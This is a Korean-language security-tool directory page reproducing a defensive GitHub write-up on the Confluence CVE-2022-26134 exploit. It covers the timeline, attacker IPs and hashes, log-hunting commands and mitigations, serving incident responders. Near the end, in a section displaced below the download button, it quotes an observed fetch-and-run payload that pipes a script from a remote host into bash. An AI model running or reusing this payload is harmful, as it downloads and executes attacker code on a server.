Skip to content
KitploitKITPLOIT
도구블로그
제출
도구블로그
제출

해킹, 침투 테스트 및 사이버 보안 도구를 당신의 보안 무기고에!

Kitploit은 해킹, 사이버 보안 및 침투 테스트 도구 디렉토리입니다. 최신 프로젝트 업데이트를 발견하여 취약점을 찾고, 시스템을 분석하고, 테스트를 자동화하고, 보안을 강화하세요.

··피드·문의·개인정보·© 2026 Kitploit

도구 디렉토리

카테고리

모든 카테고리 보기
Loading categories
Confluence-CVE-2022-26134 — 이 저장소는 Atlassian Confluence의 제로데이(Zero-Day) 악용에 대해 다루며, SecOps 또는 Blue Team 관점에서의 방어 및 분석 관점을 제시합니다. | Kitploit
도구/GitHubGitHub/archanchoudhury/confluence-cve-2022-26134
Indicator of Compromise (IOC) ManagementVulnerability AnalysisExploitationForensicsWeb SecurityThreat IntelligenceIntrusion DetectionLearning & EducationIncident Response

인기

모두 보기 →

커뮤니티에서 가장 많이 사용되는 도구를 찾아보세요.

모든 도구 탐색

도구 컬렉션을 둘러보세요

모든 도구 보기 →
공유
GitHubarchanchoudhury/confluence-cve-2022-26134

Confluence-CVE-2022-26134

이 저장소는 Atlassian Confluence의 제로데이(Zero-Day) 악용에 대해 다루며, SecOps 또는 Blue Team 관점에서의 방어 및 분석 관점을 제시합니다.

저장소 보기
44년 전아직 검토되지 않음

Confluence-CVE-2022-26134

이 저장소는 Atlassian Confluence의 제로데이 익스플로잇에 대해 다루며, SecOps 또는 블루 팀(Blue Team) 관점에서의 방어 및 분석 시각을 제공합니다.

목차

  • 소개
  • 타임라인
  • 익스플로잇 이해
  • IOC 목록
  • 탐지 전략
  • 완화 계획
  • 참고 자료

소개

미국 현충일(Memorial Day) 주말 동안 Volexity는 Atlassian Confluence Server 소프트웨어를 실행 중인 고객의 인터넷에 노출된 웹 서버 두 대와 관련된 침해 사고 대응 조사를 수행했습니다. 조사는 호스트에서 의심스러운 활동이 감지된 후 시작되었으며, 여기에는 JSP 웹셸이 디스크에 기록되는 것이 포함되었습니다. Volexity는 즉시 Volexity Surge Collect Pro를 사용하여 분석을 위해 Confluence Server 시스템의 시스템 메모리와 주요 파일을 수집했습니다. 수집된 데이터를 철저히 검토한 후, Volexity는 서버 침해가 원격 코드 실행을 달성하기 위해 공격자가 익스플로잇을 실행한 데서 비롯되었음을 확인할 수 있었습니다. 이후 Volexity는 해당 익스플로잇을 재현하고 완전히 최신 상태인 Confluence Server 버전에 영향을 미치는 제로데이 취약점을 식별했습니다.

이 취약점의 발견과 검증 이후, Volexity는 2022년 5월 31일 관련 세부 정보를 보고하기 위해 Atlassian에 연락했습니다. Atlassian은 이후 취약점을 확인하고 해당 이슈를 CVE-2022-26134로 지정했습니다. 이 취약점은 현재 버전의 Confluence Server 및 Data Center에서도 작동하는 것으로 확인되었습니다.

타임라인

  • 6월 2일 13:00 PT(20:00 UTC)자 권고는 결함의 특성을 설명하지 않으며, "현재 활발한 악용"이 탐지되었음을 밝힙니다. 사용 가능한 패치는 없습니다.
  • Volexity가 2022년 6월 3일(GMT)에 Confluence에서 제로데이를 발견했습니다.
  • 2022년 6월 3일(GMT), Atlassian
    • 영향을 받는 버전을 명확히 함
    • WAF 규칙을 추가함
    • 수정 사항이 제공될 예상 기간을 추가함
  • 2022년 6월 3일, 인터넷 전반에 걸쳐 활발한 악용 시도와 PoC가 공개되는 것을 확인했습니다.
  • 2022년 6월 3일 오전 8시 PDT(태평양 표준시, -7시간), Atlassian이 대체 jar 및 클래스 파일을 포함한 완화 정보를 제공함
  • 2022년 6월 3일 오전 10시 PDT(태평양 표준시, -7시간), Atlassian이 수정된 버전으로 업데이트하고 WAF 규칙 추가에 대한 임시 권고를 제거함.
  • 2022년 6월 3일 오후 4시 PDT(태평양 표준시, -7시간), Atlassian이 롤링 업그레이드의 제한 사항을 명확히 하도록 업데이트함.

기술적 세부 정보는 여기를 참조하세요.

익스플로잇 이해

  • 이 익스플로잇의 작동 원리와 분석 세부 사항을 완전히 이해하려면 Volexity 블로그 여기를 참조하세요.
  • 익스플로잇과 그 대응 방법을 이해하려면 이 동영상을 시청하세요.

IOC 목록

  • 이는 제로데이 취약점이며 매우 쉽게 악용될 수 있으므로 전용 IOC 목록은 없습니다. 커뮤니티 연구에 따르면 공격자는 악용 후 XMRIG, KINSING, MIRAI 등을 배포하려 한 것으로 관찰되었습니다.
  • 익스플로잇 문자열에는 ${ 문자열이 "포함되어 있는 것"으로 보입니다. 이 패턴은 URL 인코딩되지 않으며 URL에 안전하지 않으므로 로그에는 $%7B로 표시됩니다.
  • Volexity 블로그는 Confluence 파일인 noop.jsp를 언급합니다.
  • 경로 정보 없이 .jsp 확장자를 가진 웹셸이 존재합니다. 예: 이것
  • 일부 IP 주소-
root@kitploit:~
154.146.34.145
154.16.105.147
156.146.34.46
156.146.34.52
156.146.34.9
156.146.56.136
198.147.22.148
198.147.22.148
221.178.126.244
45.43.19.91
59.163.248.170
64.64.228.239
66.115.182.102
66.115.182.111
67.149.61.16
98.32.230.38
193.106.191.48
  • 악성 noop.jsp의 파일 해시
root@kitploit:~
f39b321472b8dac2452e4c0bc687cb5aa401ac6687520fdc9fd523a17477886d
f8df4dd46f02dc86d37d46cf4793e036
  • 2022년 6월 4일, 광범위한 Atlassian Confluence CVE-2022-26134 악용, 특히 기능이 확인된 악용이 관찰되었습니다. 고유 IP는 여기에서 확인하세요.

탐지 전략

  • 인터넷에 노출된 패치되지 않은 Confluence Server 및 Data Center가 있다면 이를 침해된(Compromised) 상태로 간주하는 것이 현명합니다.
  • 디스크의 Confluence 경로에서 .jsp 확장자 또는 기타 확장자를 가진 새 파일을 찾으십시오.
  • Tomcat 로그에서 의심스러운 자식 프로세스를 찾으십시오.
root@kitploit:~
DeviceProcessEvents
| where InitiatingProcessFileName has_any( @"tomcat9.exe")
//| where ProcessCommandLine has_any (@"whoami.exe",@"nslookup.exe")
  • (install directory)/logs/*.log에서 ${ 문자열을 찾으십시오.
  • 액세스 로그에서 egrep -a -i -f pattern.txt *.log 를 시도하세요. 여기서 pattern.txt에는 ${가 저장되어 있어야 합니다. 또는 grep "\${" log file path 또는 grep "$%7B" log file path를 시도하세요.
  • noop.js에 대한 웹 요청이 들어올 수 있으므로 findstr -i noop.jsp "logpath"를 시도해 볼 수 있습니다.
  • 설치 디렉터리가 다를 수 있으므로 confluence_install_dir/work/Standalone/ 디렉터리에서 $jspname_jsp.java를 찾아보세요. 예를 들어 hack.jsp라는 셸 이름을 찾았다면 hack_jsp.java도 있어야 합니다. 디스크에 hack.jsp가 더 이상 없다면 웹 로그에서 해당 파일에 대한 액세스를 찾아보세요. 이를 통해 해당 파일이 언제 액세스/삭제되었는지에 대한 중요한 단서를 얻을 수 있습니다.
  • David가 여기에서 설명한 대로 EQL 쿼리 가 식별에 도움이 될 수 있습니다.
root@kitploit:~
./admin/findspaceattachments.jsp
./admin/cluster/hashclustername.jsp
./admin/default.jsp
./classpath.jsp
./errors/notfound.jsp
./500page.jsp
./errors.jsp
./noop.jsp

따라서 위에 나열되지 않은 새로 생성된 파일을 찾으십시오.

  • 목록에 없는 디스크의 파일과 200 응답이 있는 액세스 로그의 파일을 확인하십시오. 또한 이러한 파일 중 수정된 것이 있는지 확인하십시오. 특히 noop.jsp가 널리 사용되며 일반적으로 약 103바이트입니다.
  • noop.jsp 파일이 관련된 것으로 확인되었다면 이 스크립트를 활용하여 의심스러운지 확인하십시오.
  • 이 스크립트를 사용하여 로그에서 잠재적 위협 행위자를 빠르게 스캔할 수 있습니다. 참고- IP 목록은 사용 전에 검증되어야 하며, 이 목록이 완전하지도 않습니다.
  • 여러 사례를 조사하여 ./confluence/org/apache/jsp/ 디렉터리에 있어서는 안 되는 .java 파일을 찾으십시오.
  • 익스플로잇 시도가 식별된 모든 호스트에서 프로세스 트리와 프로세스 실행을 찾으십시오. java->bash->python->bash와 같은 프로세스 트리를 찾아야 합니다.
  • Java 루트 프로세스 아래에서, 다른 bash 프로세스의 자식인 python 프로세스에 의해 생성된 bash 프로세스를 찾으십시오. 이러한 종류의 실행은 반드시 식별되어야 합니다.

완화 계획

  • 이 저장소의 첫 커밋 시점을 기준으로, Atlassian은 여기에서 패치된 버전의 Confluence Server 및 Data Center를 출시했습니다.
  • Confluence를 즉시 업그레이드할 수 없다면 임시 해결책으로 여기에 설명된 대로 다음 파일을 업데이트하여 CVE-2022-26134 문제를 완화할 수 있습니다.
  • 즉각적인 조치로, 인터넷에 노출된 인스턴스를 식별하고 탐지를 수행하기 위한 침해 사고 대응 계획을 수립하십시오. 또한 위험 표면을 줄이기 위해 서버를 IP 화이트리스트 또는 VPN 아래에 두십시오.

참고 자료

  • https://www.rapid7.com/blog/post/2022/06/02/active-exploitation-of-confluence-cve-2022-26134/
  • https://www.theregister.com/2022/06/03/atlassian_confluence_critical_flaw_attacked/
  • https://www.volexity.com/blog/2022/06/02/zero-day-exploitation-of-atlassian-confluence/
  • https://www.shodan.io/search?query=x-confluence
  • https://www.shodan.io/search?query=http.favicon.hash%3A-305179312
  • https://www.pwndefend.com/2022/06/03/cve-2022-26134-confluence-zero-day-rce/
  • https://www.cisa.gov/uscert/ncas/current-activity/2022/06/02/cisa-adds-one-known-exploited-vulnerability-cve-2022-26134-catalog
  • https://attackerkb.com/topics/BH1D56ZEhs/cve-2022-26134/rapid7-analysis?referrer=notificationEmail
  • https://blog.cloudflare.com/cloudflare-observations-of-confluence-zero-day-cve-2022-26134/
도구 다운로드
process where event='CreateProcess' and parent_process_path='/opt/atlassian/confluence/jre/bin/java' and process_user_name='confluence'
  • 웹 로그에서 이 일반적인 페이로드 bash -c '(curl -s 195.2.79[.]26/cf.sh||wget -q -O- 195.2.79[.]26/cf.sh)|bash를 찾으십시오.
  • Suricata 시그니처는 여기에서 찾을 수 있습니다.
  • 모든 환경이 다를 수 있지만 Confluence에는 대체로 다음 JSP 파일만 존재합니다: